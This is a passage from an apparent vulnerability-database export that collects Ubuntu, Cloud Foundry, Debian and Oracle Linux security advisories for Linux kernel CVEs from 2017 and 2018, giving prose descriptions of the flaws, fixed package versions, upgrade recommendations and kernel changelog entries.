existed in the futex \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash). (CVE-2018-6927)\n\nIt was discovered that an information leak vulnerability existed in the \nfloppy driver in the Linux kernel. A local attacker could use this to \nexpose sensitive information (kernel memory). (CVE-2018-7755)\n\nIt was discovered that a memory leak existed in the SAS driver subsystem of \nthe Linux kernel. A local attacker could use this to cause a denial of \nservice (memory exhaustion). (CVE-2018-7757)", "edition": 6, "modified": "2018-07-02T00:00:00", "published": "2018-07-02T00:00:00", "id": "USN-3698-2", "href": "https://ubuntu.com/security/notices/USN-3698-2", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:33:02", "bulletinFamily": "software", "cvelist": ["CVE-2017-14051", "CVE-2017-14489", "CVE-2017-14991", "CVE-2017-9984", "CVE-2017-15537", "CVE-2017-12192", "CVE-2017-9985", "CVE-2017-10911", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12153", "CVE-2017-12154"], "description": "# \n\n# Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3469-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nAnthony Perard discovered that the Xen virtual block driver did not properly initialize some data structures before passing them to user space. A local attacker in a guest VM could use this to expose sensitive information from the host OS or other guest VMs. ([CVE-2017-10911](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-10911>))\n\nBo Zhang discovered that the netlink wireless configuration interface in the Linux kernel did not properly validate attributes when handling certain requests. A local attacker with the CAP_NET_ADMIN could use this to cause a denial of service (system crash). ([CVE-2017-12153](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12153>))\n\nIt was discovered that the nested KVM implementation in the Linux kernel in some situations did not properly prevent second level guests from reading and writing the hardware CR8 register. A local attacker in a guest could use this to cause a denial of service (system crash).\n\nIt was discovered that the key management subsystem in the Linux kernel did not properly restrict key reads on negatively instantiated keys. A local attacker could use this to cause a denial of service (system crash). ([CVE-2017-12192](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12192>))\n\nIt was discovered that an integer overflow existed in the sysfs interface for the QLogic 24xx+ series SCSI driver in the Linux kernel. A local privileged attacker could use this to cause a denial of service (system crash). ([CVE-2017-14051](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14051>))\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux kernel did not properly initialize a data structure returned to user space. A local attacker could use this to expose sensitive information (kernel memory). ([CVE-2017-14156](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14156>))\n\nDave Chinner discovered that the XFS filesystem did not enforce that the realtime inode flag was settable only on filesystems on a realtime device. A local attacker could use this to cause a denial of service (system crash). ([CVE-2017-14340](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14340>))\n\nChunYu Wang discovered that the iSCSI transport implementation in the Linux kernel did not properly validate data structures. A local attacker could use this to cause a denial of service (system crash). ([CVE-2017-14489](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14489>))\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not properly initialize data returned to user space in some situations. A local attacker could use this to expose sensitive information (kernel memory). ([CVE-2017-14991](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14991>))\n\nDmitry Vyukov discovered that the Floating Point Unit (fpu) subsystem in the Linux kernel did not properly handle attempts to set reserved bits in a task\u2019s extended state (xstate) area. A local attacker could use this to cause a denial of service (system crash). ([CVE-2017-15537](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-15537>))\n\nPengfei Wang discovered that the Turtle Beach MultiSound audio device driver in the Linux kernel contained race conditions when fetching from the ring-buffer. A local attacker could use this to cause a denial of service (infinite loop). ([CVE-2017-9984](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-9984>), [CVE-2017-9985](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-9985>))\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3421.x versions prior to 3421.32\n * 3445.x versions prior to 3445.17\n * 3468.x versions prior to 3468.11\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3421.x versions prior to 3421.32\n * Upgrade 3445.x versions prior to 3445.17\n * Upgrade 3468.x versions prior to 3468.11\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io>).\n\n# References\n\n * [USN-3469-2](<http://www.ubuntu.com/usn/usn-3469-2/>)\n * [CVE-2017-10911](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-10911>)\n * [CVE-2017-12153](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12153>)\n * [CVE-2017-12192](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12192>)\n * [CVE-2017-14051](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14051>)\n * [CVE-2017-14156](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14156>)\n * [CVE-2017-14340](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14340>)\n * [CVE-2017-14489](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14489>)\n * [CVE-2017-14991](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14991>)\n * [CVE-2017-15537](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-15537>)\n * [CVE-2017-9984](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-9984>)\n * [CVE-2017-9985](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-9985>)\n * [CVE-2017-12154](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12154>)\n", "edition": 5, "modified": "2017-11-27T00:00:00", "published": "2017-11-27T00:00:00", "id": "CFOUNDRY:14981E32944F89BB69AF2D0158A379F0", "href": "https://www.cloudfoundry.org/blog/usn-3469-2/", "title": "USN-3469-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-10-30T13:25:10", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000380", "CVE-2017-1000111", "CVE-2017-14489", "CVE-2017-12146", "CVE-2017-7518", "CVE-2017-1000252", "CVE-2017-14106", "CVE-2017-14140", "CVE-2017-10661", "CVE-2017-1000251", "CVE-2017-1000112", "CVE-2017-7558", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-1000370", "CVE-2017-12134", "CVE-2017-12153", "CVE-2017-1000371", "CVE-2017-14497", "CVE-2017-12154", "CVE-2017-11600"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3981-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nSeptember 20, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : linux\nCVE ID : CVE-2017-7518 CVE-2017-7558 CVE-2017-10661 CVE-2017-11600\n CVE-2017-12134 CVE-2017-12146 CVE-2017-12153 CVE-2017-12154\n CVE-2017-14106 CVE-2017-14140 CVE-2017-14156 CVE-2017-14340\n CVE-2017-14489 CVE-2017-14497 CVE-2017-1000111 CVE-2017-1000112\n CVE-2017-1000251 CVE-2017-1000252 CVE-2017-1000370 CVE-2017-1000371\n CVE-2017-1000380\nDebian Bug : 866511 875881\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-7518\n\n Andy Lutomirski discovered that KVM is prone to an incorrect debug\n exception (#DB) error occurring while emulating a syscall\n instruction. A process inside a guest can take advantage of this\n flaw for privilege escalation inside a guest.\n\nCVE-2017-7558 (stretch only)\n\n Stefano Brivio of Red Hat discovered that the SCTP subsystem is\n prone to a data leak vulnerability due to an out-of-bounds read\n flaw, allowing to leak up to 100 uninitialized bytes to userspace.\n\nCVE-2017-10661 (jessie only)\n\n Dmitry Vyukov of Google reported that the timerfd facility does\n not properly handle certain concurrent operations on a single file\n descriptor. This allows a local attacker to cause a denial of\n service or potentially execute arbitrary code.\n\nCVE-2017-11600\n\n Bo Zhang reported that the xfrm subsystem does not properly\n validate one of the parameters to a netlink message. Local users\n with the CAP_NET_ADMIN capability can use this to cause a denial\n of service or potentially to execute arbitrary code.\n\nCVE-2017-12134 / #866511 / XSA-229\n\n Jan H. Schoenherr of Amazon discovered that when Linux is running\n in a Xen PV domain on an x86 system, it may incorrectly merge\n block I/O requests. A buggy or malicious guest may trigger this\n bug in dom0 or a PV driver domain, causing a denial of service or\n potentially execution of arbitrary code.\n\n This issue can be mitigated by disabling merges on the underlying\n back-end block devices, e.g.:\n echo 2 > /sys/block/nvme0n1/queue/nomerges\n\nCVE-2017-12146 (stretch only)\n\n Adrian Salido of Google reported a race condition in access to the\n "driver_override" attribute for platform devices in sysfs. If\n unprivileged users are permitted to access this attribute, this\n might allow them to gain privileges.\n\nCVE-2017-12153\n\n bo Zhang reported that the cfg80211 (wifi) subsystem does not\n properly validate the parameters to a netlink message. Local users\n with the CAP_NET_ADMIN capability (in any user namespace with a\n wifi device) can use this to cause a denial of service.\n\nCVE-2017-12154\n\n Jim Mattson of Google reported that the KVM implementation for\n Intel x86 processors did not correctly handle certain nested\n hypervisor configurations. A malicious guest (or nested guest in a\n suitable L1 hypervisor) could use this for denial of service.\n\nCVE-2017-14106\n\n Andrey Konovalov discovered that a user-triggerable division by\n zero in the tcp_disconnect() function could result in local denial\n of service.\n\nCVE-2017-14140\n\n Otto Ebeling reported that the move_pages() system call performed\n insufficient validation of the UIDs of the calling and target\n processes, resulting in a partial ASLR bypass. This made it easier\n for local users to exploit vulnerabilities in programs installed\n with the set-UID permission bit set.\n\nCVE-2017-14156\n\n "sohu0106" reported an information leak in the atyfb video driver.\n A local user with access to a framebuffer device handled by this\n driver could use this to obtain sensitive information.\n\nCVE-2017-14340\n\n Richard Wareing discovered that the XFS implementation allows the\n creation of files with the "realtime" flag on a filesystem with no\n realtime device, which can result in a crash (oops). A local user\n with access to an XFS filesystem that does not have a realtime\n device can use this for denial of service.\n\nCVE-2017-14489\n\n ChunYu Wang of Red Hat discovered that the iSCSI subsystem does not\n properly validate the length of a netlink message, leading to\n memory corruption. A local user with permission to manage iSCSI\n devices can use this for denial of service or possibly to execute\n arbitrary code.\n\nCVE-2017-14497 (stretch only)\n\n Benjamin Poirier of SUSE reported that vnet headers are not\n properly handled within the tpacket_rcv() function in the raw\n packet (af_packet) feature. A local user with the CAP_NET_RAW\n capability can take advantage of this flaw to cause a denial of\n service (buffer overflow, and disk and memory corruption) or have\n other impact.\n\nCVE-2017-1000111\n\n Andrey Konovalov of Google reported a race condition in the raw\n packet (af_packet) feature. Local users with the CAP_NET_RAW\n capability can use this for denial of service or possibly to\n execute arbitrary code.\n\nCVE-2017-1000112\n\n Andrey Konovalov of Google reported a race condition flaw in the\n UDP Fragmentation Offload (UFO) code. A local user can use this\n flaw for denial of service or possibly to execute arbitrary code.\n\nCVE-2017-1000251 / #875881\n\n Armis Labs discovered that the Bluetooth subsystem does not\n properly validate L2CAP configuration responses, leading to a\n stack buffer overflow. This is one of several vulnerabilities\n dubbed "Blueborne". A nearby attacker can use this to cause a\n denial of service or possibly to execute arbitrary code on a\n system with Bluetooth enabled.\n\nCVE-2017-1000252 (stretch only)\n\n Jan H. Schoenherr of Amazon reported that the KVM implementation\n for Intel x86 processors did not correctly validate interrupt\n injection requests. A local user with permission to use KVM could\n use this for denial of service.\n\nCVE-2017-1000370\n\n The Qualys Research Labs reported that a large argument or\n environment list can result in ASLR bypass for 32-bit PIE binaries.\n\nCVE-2017-1000371\n\n The Qualys Research Labs reported that a large argument\n orenvironment list can result in a stack/heap clash for 32-bit\n PIE binaries.\n\nCVE-2017-1000380\n\n Alexander Potapenko of Google reported a race condition in the ALSA\n (sound) timer driver, leading to an information leak. A local user\n with permission to access sound devices could use this to obtain\n sensitive information.\n\nDebian disables unprivileged user namespaces by default, but if they\nare enabled (via the kernel.unprivileged_userns_clone sysctl) then\nCVE-2017-11600, CVE-2017-14497 and CVE-2017-1000111 can be exploited\nby any local user.\n\nFor the oldstable distribution (jessie), these problems have been fixed\nin version 3.16.43-2+deb8u5.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 4.9.30-2+deb9u5.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 29, "modified": "2017-09-20T21:36:13", "published": "2017-09-20T21:36:13", "id": "DEBIAN:DSA-3981-1:0F636", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00243.html", "title": "[SECURITY] [DSA 3981-1] linux security update", "type": "debian", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-08-12T01:03:06", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-1000380", "CVE-2017-1000111", "CVE-2017-14489", "CVE-2017-7889", "CVE-2017-14106", "CVE-2017-14140", "CVE-2017-10661", "CVE-2017-1000251", "CVE-2017-10911", "CVE-2017-7482", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12134", "CVE-2017-12153", "CVE-2017-1000363", "CVE-2017-7542", "CVE-2017-12154", "CVE-2017-11600", "CVE-2017-1000365"], "description": "Package : linux\nVersion : 3.2.93-1\nCVE ID : CVE-2017-7482 CVE-2017-7542 CVE-2017-7889 CVE-2017-10661 \n CVE-2017-10911 CVE-2017-11176 CVE-2017-11600 CVE-2017-12134 \n CVE-2017-12153 CVE-2017-12154 CVE-2017-14106 CVE-2017-14140 \n CVE-2017-14156 CVE-2017-14340 CVE-2017-14489 CVE-2017-1000111 \n CVE-2017-1000251 CVE-2017-1000363 CVE-2017-1000365\n\t\t CVE-2017-1000380\nDebian Bug : #866511 #875881\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-7482\n\n Shi Lei discovered that RxRPC Kerberos 5 ticket handling code does\n not properly verify metadata, leading to information disclosure,\n denial of service or potentially execution of arbitrary code.\n\nCVE-2017-7542\n\n An integer overflow vulnerability in the ip6_find_1stfragopt()\n function was found allowing a local attacker with privileges to open\n raw sockets to cause a denial of service.\n\nCVE-2017-7889\n\n Tommi Rantala and Brad Spengler reported that the mm subsystem does\n not properly enforce the CONFIG_STRICT_DEVMEM protection mechanism,\n allowing a local attacker with access to /dev/mem to obtain\n sensitive information or potentially execute arbitrary code.\n\nCVE-2017-10661\n\n Dmitry Vyukov of Google reported that the timerfd facility does\n not properly handle certain concurrent operations on a single file\n descriptor. This allows a local attacker to cause a denial of\n service or potentially to execute arbitrary code.\n\nCVE-2017-10911 / XSA-216\n\n Anthony Perard of Citrix discovered an information leak flaw in Xen\n blkif response handling, allowing a malicious unprivileged guest to\n obtain sensitive information from the host or other guests.\n\nCVE-2017-11176\n\n It was discovered that the mq_notify() function does not set the\n sock pointer to NULL upon entry into the retry logic. An attacker\n can take advantage of this flaw during a userspace close of a\n Netlink socket to cause a denial of service or potentially cause\n other impact.\n\nCVE-2017-11600\n\n bo Zhang reported that the xfrm subsystem does not properly\n validate one of the parameters to a netlink message. Local users\n with the CAP_NET_ADMIN capability can use this to cause a denial\n of service or potentially to execute arbitrary code.\n\nCVE-2017-12134 / #866511 / XSA-229\n\n Jan H. Sch\u00f6nherr of Amazon discovered that when Linux is running\n in a Xen PV domain on an x86 system, it may incorrectly merge\n block I/O requests. A buggy or malicious guest may trigger this\n bug in dom0 or a PV driver domain, causing a denial of service or\n potentially execution of arbitrary code.\n\n This issue can be mitigated by disabling merges on the underlying\n back-end block devices, e.g.:\n echo 2 > /sys/block/nvme0n1/queue/nomerges\n\nCVE-2017-12153\n\n bo Zhang reported that the cfg80211 (wifi) subsystem does not\n properly validate the parameters to a netlink message. Local users\n with the CAP_NET_ADMIN capability on a system with a wifi device\n can use this to cause a denial of service.\n\nCVE-2017-12154\n\n Jim Mattson of Google reported that the KVM implementation for\n Intel x86 processors did not correctly handle certain nested\n hypervisor configurations. A malicious guest (or nested guest in a\n suitable L1 hypervisor) could use this for denial of service.\n\nCVE-2017-14106\n\n Andrey Konovalov of Google reported that a specific sequence of\n operations on a TCP socket could lead to division by zero. A\n local user could use this for denial of service.\n\nCVE-2017-14140\n\n Otto Ebeling reported that the move_pages() system call permitted\n users to discover the memory layout of a set-UID process running\n under their real user-ID. This made it easier for local users to\n exploit vulnerabilities in programs installed with the set-UID\n permission bit set.\n\nCVE-2017-14156\n\n "sohu0106" reported an information leak in the atyfb video driver.\n A local user with access to a framebuffer device handled by this\n driver could use this to obtain sensitive information.\n\nCVE-2017-14340\n\n Richard Wareing discovered that the XFS implementation allows the\n creation of files with the "realtime" flag on a filesystem with no\n realtime device, which can result in a crash (oops). A local user\n with access to an XFS filesystem that does not have a realtime\n device can use this for denial of service.\n\nCVE-2017-14489\n\n ChunYu of Red Hat discovered that the iSCSI subsystem does not\n properly validate the length of a netlink message, leading to\n memory corruption. A local user with permission to manage iSCSI\n devices can use this for denial of service or possibly to\n execute arbitrary code.\n\nCVE-2017-1000111\n\n Andrey Konovalov of Google reported that a race condition in the\n raw packet (af_packet) feature. Local users with the CAP_NET_RAW\n capability can use this to cause a denial of service or possibly to\n execute arbitrary code.\n\nCVE-2017-1000251 / #875881\n\n Armis Labs discovered that the Bluetooth subsystem does not\n properly validate L2CAP configuration responses, leading to a\n stack buffer overflow. This is one of several vulnerabilities\n dubbed "Blueborne". A nearby attacker can use this to cause a\n denial of service or possibly to execute arbitrary code on a\n system with Bluetooth enabled.\n\nCVE-2017-1000363\n\n Roee Hay reported that the lp driver does not properly bounds-check\n passed arguments. This has no security impact in Debian.\n\nCVE-2017-1000365\n\n It was discovered that argument and environment pointers are not\n properly taken into account by the size restrictions on arguments\n and environmental strings passed through execve(). A local\n attacker can take advantage of this flaw in conjunction with other\n flaws to execute arbitrary code.\n\nCVE-2017-1000380\n\n Alexander Potapenko of Google reported a race condition in the ALSA\n (sound) timer driver, leading to an information leak. A local user\n with permission to access sound devices could use this to obtain\n sensitive information.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n3.2.93-1. This version also includes bug fixes from upstream versions\nup to and including 3.2.93.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n3.16.43-2+deb8u4 or were fixed in an earlier version.\n\nFor Debian 9 "Stretch", these problems have been fixed in version\n4.9.30-2+deb9u4 or were fixed in an earlier version.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \nBen Hutchings - Debian developer, member of kernel, installer and LTS teams", "edition": 10, "modified": "2017-09-20T17:48:01", "published": "2017-09-20T17:48:01", "id": "DEBIAN:DLA-1099-1:57108", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201709/msg00017.html", "title": "[SECURITY] [DLA 1099-1] linux security update", "type": "debian", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:28", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14489", "CVE-2017-7618", "CVE-2017-14106", "CVE-2017-10661", "CVE-2017-1000112", "CVE-2017-7482", "CVE-2017-7541", "CVE-2017-7542", "CVE-2017-12154"], "description": "[4.1.12-103.9.2]\n- Revert 'drivers/char/mem.c: deny access in open operation when securelevel is set' (Brian Maly) [Orabug: 27037811]\n[4.1.12-103.9.1]\n- xfs: use dedicated log worker wq to avoid deadlock with cil wq (Brian Foster) [Orabug: 27013241] \n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn't parse nlmsg properly (Xin Long) [Orabug: 26988633] {CVE-2017-14489}\n- nvme: honor RTD3 Entry Latency for shutdowns (Martin K. Petersen) [Orabug: 26999097] \n- ipv6: avoid overflow of offset in ip6_find_1stfragopt (Sabrina Dubroca) [Orabug: 27013220] {CVE-2017-7542}\n- udp: consistently apply ufo or fragmentation (Willem de Bruijn) [Orabug: 27013227] {CVE-2017-1000112}\n- drivers/char/mem.c: deny access in open operation when securelevel is set (Ethan Zhao) [Orabug: 26943884]\n[4.1.12-103.8.1]\n- tcp: fix tcp_mark_head_lost to check skb len before fragmenting (Neal Cardwell) [Orabug: 26923675] \n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) [Orabug: 26899775] {CVE-2017-10661}\n- kvm: nVMX: Don't allow L2 to access the hardware CR8 (Jim Mattson) {CVE-2017-12154} {CVE-2017-12154}\n- brcmfmac: fix possible buffer overflow in brcmf_cfg80211_mgmt_tx() (Tim Tianyang Chen) [Orabug: 26880590] {CVE-2017-7541}\n- crypto: ahash - Fix EINPROGRESS notification callback (Herbert Xu) [Orabug: 26916575] {CVE-2017-7618}\n- ovl: use O_LARGEFILE in ovl_copy_up() (David Howells) [Orabug: 25953280] \n- rxrpc: Fix several cases where a padded len isn't checked in ticket decode (David Howells) [Orabug: 26880508] {CVE-2017-7482} {CVE-2017-7482}\n- tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0 (Wei Wang) [Orabug: 26813385] {CVE-2017-14106}", "edition": 4, "modified": "2017-11-02T00:00:00", "published": "2017-11-02T00:00:00", "id": "ELSA-2017-3635", "href": "http://linux.oracle.com/errata/ELSA-2017-3635.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:31", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17972", "CVE-2017-12153", "CVE-2018-3639"], "description": "[4.1.12-124.25.1]\n- x86/bugs: Fix the AMD SSBD usage of the SPEC_CTRL MSR (Tom Lendacky) [Orabug: 28870524] {CVE-2018-3639}\n- x86/bugs: Add AMD's SPEC_CTRL MSR usage (Konrad Rzeszutek Wilk) [Orabug: 28870524] {CVE-2018-3639}\n- x86/cpufeatures: rename X86_FEATURE_AMD_SSBD to X86_FEATURE_LS_CFG_SSBD (Mihai Carabas) [Orabug: 28870524] {CVE-2018-3639}\n- Make file credentials available to the seqfile interfaces (Linus Torvalds) [Orabug: 29114879] {CVE-2018-17972}\n- proc: restrict kernel stack dumps to root (Jann Horn) [Orabug: 29114879] {CVE-2018-17972}\n- x86/speculation: Clean up retpoline code in bugs.c (Alejandro Jimenez) [Orabug: 29211617] \n- x86, modpost: Replace last remnants of RETPOLINE with CONFIG_RETPOLINE (WANG Chao) [Orabug: 29211617] \n- x86/build: Fix compiler support check for CONFIG_RETPOLINE (Masahiro Yamada) [Orabug: 29211617] \n- x86/retpoline: Remove minimal retpoline support (Zhenzhong Duan) [Orabug: 29211617] \n- x86/retpoline: Make CONFIG_RETPOLINE depend on compiler support (Zhenzhong Duan) [Orabug: 29211617] \n- nl80211: check for the required netlink attributes presence (Vladis Dronov) [Orabug: 29245533] {CVE-2017-12153} {CVE-2017-12153}\n- scsi: lpfc: Fix PT2PT PRLI reject (reapply patch) (James Smart) [Orabug: 29281346]", "edition": 2, "modified": "2019-02-06T00:00:00", "published": "2019-02-06T00:00:00", "id": "ELSA-2019-4531", "href": "http://linux.oracle.com/errata/ELSA-2019-4531.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:01", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9191", "CVE-2017-14489", "CVE-2017-7618", "CVE-2017-15649", "CVE-2017-14106", "CVE-2017-16527", "CVE-2017-10661", "CVE-2017-1000112", "CVE-2017-12192", "CVE-2017-7482", "CVE-2017-7541", "CVE-2017-16650", "CVE-2016-10318", "CVE-2017-7542", "CVE-2017-2618", "CVE-2017-12154", "CVE-2017-1000405", "CVE-2017-12190"], "description": "[4.1.12-112.14.1]\n- ext4: fix off-by-one on max nr_pages in ext4_find_unwritten_pgoff() (Eryu Guan) [Orabug: 27233471]\n[4.1.12-112.13.1]\n- cgroup: make sure a parent css isnt offlined before its children (Tejun Heo) [Orabug: 27179269]\n[4.1.12-112.12.1]\n- ctf: allow dwarf2ctf to run as root but produce no output (Nick Alcock) [Orabug: 27133094] \n- net: qmi_wwan: fix divide by 0 on bad descriptors (Bjorn Mork) [Orabug: 27215221] {CVE-2017-16650}\n- ctf: fix thinko preventing linking of out-of-tree modules when CTF is off (Nick Alcock) [Orabug: 27215293] \n- Revert 'firmware: dmi_scan: add SBMIOS entry and DMI tables' (Dan Duval) [Orabug: 27100376]\n[4.1.12-112.11.1]\n- mm, thp: Do not make page table dirty unconditionally in follow_trans_huge_pmd() (Kirill A. Shutemov) [Orabug: 27200880] {CVE-2017-1000405}\n- uek-rpm: Update linux firmware package for OL7 (Dhaval Giani) [Orabug: 27210206] \n- uek-rpm: Update firmware for OL6 UEK spec file (Dhaval Giani) [Orabug: 27210204] \n- scsi: Add STARGET_CREATED_REMOVE state to scsi_target_state (Ewan D. Milne) [Orabug: 27187218] \n- xen/time: do not decrease steal time after live migration on xen (Dongli Zhang) [Orabug: 26770163] \n- ALSA: usb-audio: Kill stray URB at exiting (Takashi Iwai) [Orabug: 27148272] {CVE-2017-16527}\n- scsi: qla2xxx: Fix NULL pointer access due to redundant fc_host_port_name call (Quinn Tran) [Orabug: 27149785] \n- scsi: qla2xxx: Initialize Work element before requesting IRQs (Himanshu Madhani) [Orabug: 27149785] \n- scsi: qla2xxx: Fix uninitialized work element (Quinn Tran) [Orabug: 27149785]\n[4.1.12-112.10.1]\n- Revert 'Improves clear_huge_page() using work queues' (Jack Vogel) [Orabug: 27055693] \n- packet: in packet_do_bind, test fanout with bind_lock held (Willem de Bruijn) [Orabug: 27069060] {CVE-2017-15649}\n- packet: hold bind lock when rebinding to fanout hook (Willem de Bruijn) [Orabug: 27069060] {CVE-2017-15649}\n- net: convert packet_fanout.sk_ref from atomic_t to refcount_t (Reshetova, Elena) [Orabug: 27069060] {CVE-2017-15649}\n- packet: fix races in fanout_add() (Eric Dumazet) [Orabug: 27069060] {CVE-2017-15649}\n- refcount_t: Introduce a special purpose refcount type (Peter Zijlstra) [Orabug: 27069060] {CVE-2017-15649}\n- locking/atomics: Add _{acquire|release|relaxed}() variants of some atomic operations (Will Deacon) [Orabug: 27069060] {CVE-2017-15649}\n- scsi: qla2xxx: Fix slow mem alloc behind lock (Quinn Tran) [Orabug: 27100873]\n[4.1.12-112.9.1]\n- xfs: Fix off-by-in in loop termination in xfs_find_get_desired_pgoff() (Jan Kara) [Orabug: 26862911] \n- xfs: Fix missed holes in SEEK_HOLE implementation (Jan Kara) [Orabug: 26862911] \n- ext4: fix off-by-in in loop termination in ext4_find_unwritten_pgoff() (Jan Kara) [Orabug: 26862911] \n- ext4: fix SEEK_HOLE (Jan Kara) [Orabug: 26862911] \n- rtc: cmos: century support (Sylvain Chouleur) [Orabug: 27025943] \n- ocfs2: code clean up for direct io (Ryan Ding) [Orabug: 27117733] \n- scsi: Dont abort scsi_scan due to unexpected response (John Sobecki) [Orabug: 27119610] \n- ocfs2: fstrim: Fix start offset of first cluster group during fstrim (Ashish Samant) [Orabug: 26326914]\n[4.1.12-112.8.1]\n- uek-rpm: disable CONFIG_NUMA_BALANCING_DEFAULT_ENABLED (Fred Herard) [Orabug: 26798697] \n- uek-rpm: Add more missing modules to OL7 ueknano (Somasundaram Krishnasamy) [Orabug: 27028326] \n- fix unbalanced page refcounting in bio_map_user_iov (Vitaly Mayatskikh) [Orabug: 27069034] {CVE-2017-12190}\n- more bio_map_user_iov() leak fixes (Al Viro) [Orabug: 27069034] {CVE-2017-12190}\n- usb: Quiet down false peer failure messages (Don Zickus) [Orabug: 26669801] \n- ovl: during copy up, switch to mounters creds early (Vivek Goyal) [Orabug: 27052885] \n- ovl: lookup: do getxattr with mounters permission (Miklos Szeredi) [Orabug: 27052885] \n- ovl: get rid of the dead code left from broken (and disabled) optimizations (Al Viro) [Orabug: 27052885] \n- selinux: Implement dentry_create_files_as() hook (Vivek Goyal) [Orabug: 27052885] \n- security, overlayfs: Provide hook to correctly label newly created files (Vivek Goyal) [Orabug: 27052885] \n- selinux: Pass security pointer to determine_inode_label() (Vivek Goyal) [Orabug: 27052885] \n- selinux: Implementation for inode_copy_up_xattr() hook (Vivek Goyal) [Orabug: 27052885] \n- security,overlayfs: Provide security hook for copy up of xattrs for overlay file (Vivek Goyal) [Orabug: 27052885] \n- selinux: Implementation for inode_copy_up() hook (Vivek Goyal) [Orabug: 27052885] \n- security, overlayfs: provide copy up security hook for unioned files (Vivek Goyal) [Orabug: 27052885] \n- selinux: delay inode label lookup as long as possible (Paul Moore) [Orabug: 27052885] \n- selinux: Add accessor functions for inode->i_security (Andreas Gruenbacher) [Orabug: 27052885] \n- selinux: Create a common helper to determine an inode label [ver #3] (David Howells) [Orabug: 27052885] \n- KVM: nVMX: Fix loss of L2s NMI blocking state (Wanpeng Li) [Orabug: 27056291] \n- KVM: nVMX: track NMI blocking state 